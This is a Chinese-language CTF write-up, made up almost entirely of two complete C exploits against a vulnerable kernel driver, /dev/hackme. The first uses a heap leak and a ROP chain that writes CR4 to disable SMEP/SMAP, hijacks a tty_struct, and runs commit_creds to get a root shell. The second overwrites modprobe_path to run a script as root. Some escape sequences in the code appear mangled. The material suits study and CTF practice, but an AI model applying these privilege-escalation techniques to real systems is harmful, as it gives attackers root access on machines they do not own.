kernel heap bypass smep,smap && 劫持modprobe_path
exp1
smep:smep即用户数据不可执行,当 CPU 处于 ring0 模式时,执行用户空间的代码会触发页错误,系统根据CR4寄存器的第20位判断内核是否开启smep,为1时开启,为0时关闭(第21位是SMAP位)。
smap:smap用户数据不可访问。
通过控制cr4寄存器为0x6f0即可绕过。
#include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> size_t vmlinux_base, off, commit_creds, prepare_kernel_cred; size_t user_cs, user_ss, user_sp, user_rflags; size_t raw_vmlinux_base = 0xffffffff81000000; size_t rop[0x100] = {0}; int fd; struct Heap{ size_t index; char *data; size_t len; size_t offset; }; void add(int index, size_t len, char *data) { struct Heap heap; heap.index = index; heap.data = data; heap.len = len; ioctl(fd, 0x30000, &heap); } void delete(int index) { struct Heap heap; heap.index = index; ioctl(fd, 0x30001, &heap); } void edit(int index, size_t len, size_t offset, char *data) { struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl(fd, 0x30002, &heap); } void show(int index, size_t len, size_t offset, char *data) { struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl(fd, 0x30003, &heap); } void save_status() { __asm__( "mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("[+] save the state success!"); } void get_shell() { if (getuid() == 0) { puts("[*] get root"); system("/bin/sh"); } else { puts("[-] get root error"); sleep(3); exit(0); } } void get_root() { //commit_creds(prepare_kernel_cred(0)) void *(*pkc)(int) = (void *(*)(int))prepare_kernel_cred; void (*cc)(void *) = (void (*)(void *))commit_creds; (*cc)((*pkc)(0)); } int main() { save_status(); char buf[0x1000] = {0}; size_t fake_tty_struct[4] = {0}; size_t fake_tty_operations[35] = {0}; fd = open("/dev/hackme",0); if(fd < 0) { puts("[-] open file error"); sleep(3); exit(0); } add(0, 0x2e0, buf); // 0 add(1, 0x2e0, buf); // 1 add(2, 0x100, buf); // 2 add(3, 0x100, buf); // 3 delete(0); delete(2); show(3, 0x100, -0x100, buf); size_t heap_addr = ((size_t *)buf)[0] - 0x200; printf("[+] heap_addr=> 0x%lx/n", heap_addr); int fd_tty = open("/dev/ptmx",O_RDWR | O_NOCTTY); if(fd_tty < 0) { puts("[-] open ptmx error"); sleep(3); exit(0); } show(1, 0x400, -0x400, buf); vmlinux_base = ((size_t *)buf)[3] - 0x625d80; printf("[+] vmlinux_base=> 0x%lx/n", vmlinux_base); off = vmlinux_base - raw_vmlinux_base; commit_creds = off + 0xffffffff8104d220; prepare_kernel_cred = off + 0xffffffff8104d3d0; int i = 0; rop[i++] = off + 0xffffffff8101b5a1; // pop rax; ret; rop[i++] = 0x6f0; rop[i++] = off + 0xffffffff8100252b; // mov cr4, rax; push rcx; popfq; pop rbp; ret; rop[i++] = 0; rop[i++] = (size_t)get_root; rop[i++] = off + 0xffffffff81200c2e; // swapgs; popfq; pop rbp; ret; rop[i++] = 0; rop[i++] = 0; rop[i++] = off + 0xffffffff81019356; // iretq; pop rbp; ret; rop[i++] = (size_t)get_shell; rop[i++] = user_cs; rop[i++] = user_rflags; rop[i++] = user_sp; rop[i++] = user_ss; add(2, 0x100, (char *)rop); fake_tty_operations[7] = off + 0xffffffff810608d5; // push rax; pop rsp; ret; fake_tty_operations[0] = off + 0xffffffff810484f0; // pop rsp; ret; fake_tty_operations[1] = heap_addr; ((size_t *)buf)[3] = heap_addr + 0x100; delete(3); add(3, 0x100, (char *)fake_tty_operations); edit(1, 0x400, -0x400, buf); write(fd_tty, "FXC", 3); return 0; } exp2
mod_tree:可以泄露驱动地址,当堆栈中找不到时可以来这里查找。
modprobe_path:当我们执行一个非法文件时,就会以root权限去执行modprobe_path所指向的文件,通常是指向/sbin/modprobe,如果改成我们创建的cat flag的文件,那么就可以拿到flag
#include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <string.h> int fd; size_t heap_base, vmlinux_base, mod_tree, modprobe_path, ko_base, pool_addr; struct Heap{ size_t index; char *data; size_t len; size_t offset; }; void add(int index, size_t len, char *data) { struct Heap heap; heap.index = index; heap.data = data; heap.len = len; ioctl(fd, 0x30000, &heap); } void delete(int index) { struct Heap heap; heap.index = index; ioctl(fd, 0x30001, &heap); } void edit(int index, size_t len, size_t offset, char *data) { struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl(fd, 0x30002, &heap); } void show(int index, size_t len, size_t offset, char *data) { struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl(fd, 0x30003, &heap); } void get_flag() { puts("[+] Prepare shell file."); system("echo -ne '#!/bin/sh/n/bin/chmod 777 /flag/n' > /shell.sh"); system("chmod +x /shell.sh"); puts("[+] Prepare trigger file."); system("echo -ne '//xff//xff//xff//xff' > /FXC"); system("chmod +x /FXC"); system("cat /proc/sys/kernel/modprobe"); system("/FXC"); system("cat /flag"); sleep(5); } int main() { fd = open("/dev/hackme",0); if(fd < 0) { puts("[-] open file error"); sleep(3); exit(0); } char buf[0x1000] = {0}; add(0, 0x100, buf); // 0 add(1, 0x100, buf); // 1 add(2, 0x100, buf); // 2 add(3, 0x100, buf); // 3 add(4, 0x100, buf); // 4 delete(1); delete(3); show(4, 0x100, -0x100, buf); heap_base = ((size_t *)buf)[0] - 0x100; printf("[+] heap_addr=> 0x%lx/n", heap_base); show(0, 0x200, -0x200, buf); vmlinux_base = ((size_t *)buf)[0] - 0x8472c0; printf("[+] vmlinux_base=> 0x%lx/n", vmlinux_base); mod_tree = vmlinux_base + 0x811000; modprobe_path = vmlinux_base + 0x83f960; memset(buf,'/x00',0x100); ((size_t *)buf)[0] = mod_tree + 0x40; edit(4, 0x100, -0x100, buf); add(5, 0x100, buf); // 5 add(6, 0x100, buf); // 6 show(6, 0x40, -0x40, buf); ko_base = ((size_t *)buf)[3]; printf("[+] ko_base=> 0x%lx/n", ko_base); delete(2); delete(5); getchar(); ((size_t *)buf)[0] = ko_base + 0x2400 + 0xc0; edit(4, 0x100, -0x100, buf); add(7, 0x100, buf); // 7 add(8, 0x100, buf); // 8 ((size_t *)buf)[0] = modprobe_path; ((size_t *)buf)[1] = 0x100; edit(8, 0x10, 0, buf); strncpy(buf, "/shell.sh/x00", 0xa); edit(12, 0xa, 0, buf); get_flag(); return 0; } 
